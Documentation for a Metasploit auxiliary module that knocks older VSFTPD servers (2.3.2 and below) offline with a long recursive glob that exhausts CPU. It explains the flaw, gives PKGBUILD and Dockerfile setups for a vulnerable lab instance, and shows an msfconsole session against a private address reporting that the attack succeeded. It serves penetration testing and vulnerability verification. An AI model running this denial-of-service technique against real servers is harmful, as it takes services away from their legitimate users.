Vulnerable Application
This is an auxiliary for DOSing a VSFTPD server from version 2.3.2 and below. The vulnerability has been directly tested on versions 2.3.0, 2.3.1, and 2.3.2 and have shown success.
VSFTPD is a popular ftp server written in C. The vulnerability causes a DOS on the service by leveraging a long recursive glob statement on the server. When we fill the 4096 character buffer with this recursive glob search, it makes the current thread spend all of that time unwinding that glob statement which can use up all the resources on that core. Sending this glob on all threads leave no availability for anyone else to access the server while taking up all of the CPU resources of the machine.
Options
FTPUSER
The username used to log into the FTP server
FTPPASS
The password used to log into the FTP server
Install on Arch Linux
The software has been tested on multiple versions using arch linux. To create an installable package for the vulnerable software to test, follow these instructions.
Clone the source repository using git clone https://gitlab.archlinux.org/archlinux/packaging/packages/vsftpd.git
Replace the contents of the PKGBUILD with this
pkgname=vsftpd
pkgver=2.3.2
pkgrel=1
pkgdesc='Very Secure FTP daemon'
url='https://security.appspot.com/vsftpd.html'
arch=('x86_64')
license=('GPL2')
depends=('glibc' 'openssl' 'libcap' 'pam' 'libnsl')
optdepends=('logrotate')
backup=('etc/vsftpd.conf'
'etc/xinetd.d/vsftpd'
"etc/logrotate.d/vsftpd")
source=(https://security.appspot.com/downloads/${pkgname}-${pkgver}.tar.gz
vsftpd-ssl.socket
vsftpd.socket
vsftpd.service
[email protected]
vsftpd-ssl.service
[email protected])
sha256sums=('SKIP'
'd5185e48fffc6253499a55e0fe0f90a3424fc639640af11a9d38df33fb145afe'
'9fdbfd2ec0207170371ca3cf2b0ddca2dc2fe3d062e5792e0d3e51474c3198c9'
'0597e571718ba0f4dc4b32a4ddd148103758c48c7d65dcb8bbedafc9e810e83d'
'd7b8e4827d4f6bafcbf52f9d2d7380958c7b08bb3f757806aa89d4bc06c9671c'
'b88a50fc68b3bf746d13c9a777df77791cd3eac6eb7c2df655418071c2adf422'
'4a55c2468b08d858f71bacf1f4885847bec8e548b0e92088068d9bdd3884af84')
prepare() {
cd ${pkgname}-${pkgver}
# build-time config
sed -e 's|^#undef VSF_BUILD_SSL$|#define VSF_BUILD_SSL|' -i builddefs.h
sed -e 's|/usr/share/empty|/var/empty|g' -i tunables.c vsftpd.conf.5 INSTALL
sed -e 's|/usr/local/sbin/vsftpd|/usr/bin/vsftpd|' -i EXAMPLE/INTERNET_SITE/${pkgname}.xinetd
# fix linking to openssl 1.1
sed -e 's|SSL_library_init|SSL_CTX_new|' -i vsf_findlibs.sh
}
build() {
cd ${pkgname}-${pkgver}
make LINK='' CFLAGS="${CFLAGS} ${CPPFLAGS}" LDFLAGS="${LDFLAGS}"
}
package() {
cd ${pkgname}-${pkgver}
install -Dm 755 ${pkgname} -t "${pkgdir}/usr/bin"
install -dm 755 "${pkgdir}/var/empty"
install -Dm 644 "${srcdir}"/{*.service,*.socket} -t "${pkgdir}/usr/lib/systemd/system"
install -Dm 644 ${pkgname}.conf -t "${pkgdir}/etc"
install -Dm 644 EXAMPLE/INTERNET_SITE/${pkgname}.xinetd "${pkgdir}/etc/xinetd.d/${pkgname}"
install -Dm 644 RedHat/vsftpd.log "${pkgdir}/etc/logrotate.d/${pkgname}"
install -Dm 644 RedHat/vsftpd.pam "${pkgdir}/etc/pam.d/${pkgname}"
install -Dm 644 ${pkgname}.8 -t "${pkgdir}/usr/share/man/man8"
install -Dm 644 ${pkgname}.conf.5 -t "${pkgdir}/usr/share/man/man5"
install -Dm 644 BENCHMARKS BUGS Changelog FAQ INSTALL README README.ssl REFS \
REWARD SPEED TODO TUNING -t "${pkgdir}/usr/share/doc/${pkgname}"
}
If you want to test a different version, Change the version variable to your desired version.
Run makepkg -i to build the package and automatically install it.
Start the systemd service with sudo systemctl start vsftpd
Docker install on Arch Linux
A simple container was created to easily test this vulnerability. To easily run a vulnerable instance of this application, build this image from this Dockerfile.
Create a Dockerfile and place the content below into it
FROM archlinux:latest
ARG VERSION=2.3.2
RUN pacman -Sy --noconfirm gcc make libnsl
RUN curl -O https://security.appspot.com/downloads/vsftpd-$VERSION.tar.gz
RUN tar zxf vsftpd-$VERSION.tar.gz
WORKDIR /vsftpd-$VERSION
RUN make
RUN mkdir -p /usr/share/empty/
RUN chmod +x /vsftpd-$VERSION/vsftpd
RUN mv /vsftpd-$VERSION/vsftpd /bin/vsftpd
RUN mv /vsftpd-$VERSION/vsftpd.conf /etc/vsftpd.conf
RUN chown root:root /etc/vsftpd.conf
EXPOSE 21
CMD [ "/bin/vsftpd" ]
Run sudo docker build . -t vsftpd:2.3.2 --build-arg=2.3.2
Run sudo docker run --name vsftpd -p 21:21 vsftpd:2.3.2
Run the module against this container and the container will either slow down or crash entirely.
Verification Steps
Start msfconsole
use auxiliary/dos/ftp/vstfpd_232
set rhosts
set ftpuser
set ftppass
run
Scenarios
VSFTPD 2.3.2 - Arch linux
msf6 > use auxiliary/dos/ftp/vsftpd_232
msf6 auxiliary(dos/ftp/vstfpd_232) > set rhosts 192.168.56.106
rhosts => 192.168.56.106
msf6 auxiliary(dos/ftp/vstfpd_232) > set ftpuser anonymous
ftpuser => anonymous
msf6 auxiliary(dos/ftp/vstfpd_232) > set ftppass ''
ftppass =>
msf6 auxiliary(dos/ftp/vstfpd_232) > run
[*] Running module against 192.168.56.106
[*] 192.168.56.106:21 - sending payload
.............................................................................................
[+] 192.168.56.106:21 - Stream was cut off abruptly. Appears DOS attack succeeded.
[*] Auxiliary module execution completed
You can verify that it works by either attempting to ftp into the machine after or checking htop on the machine. If the CPU is at max capacity, that would be due to the DOS.
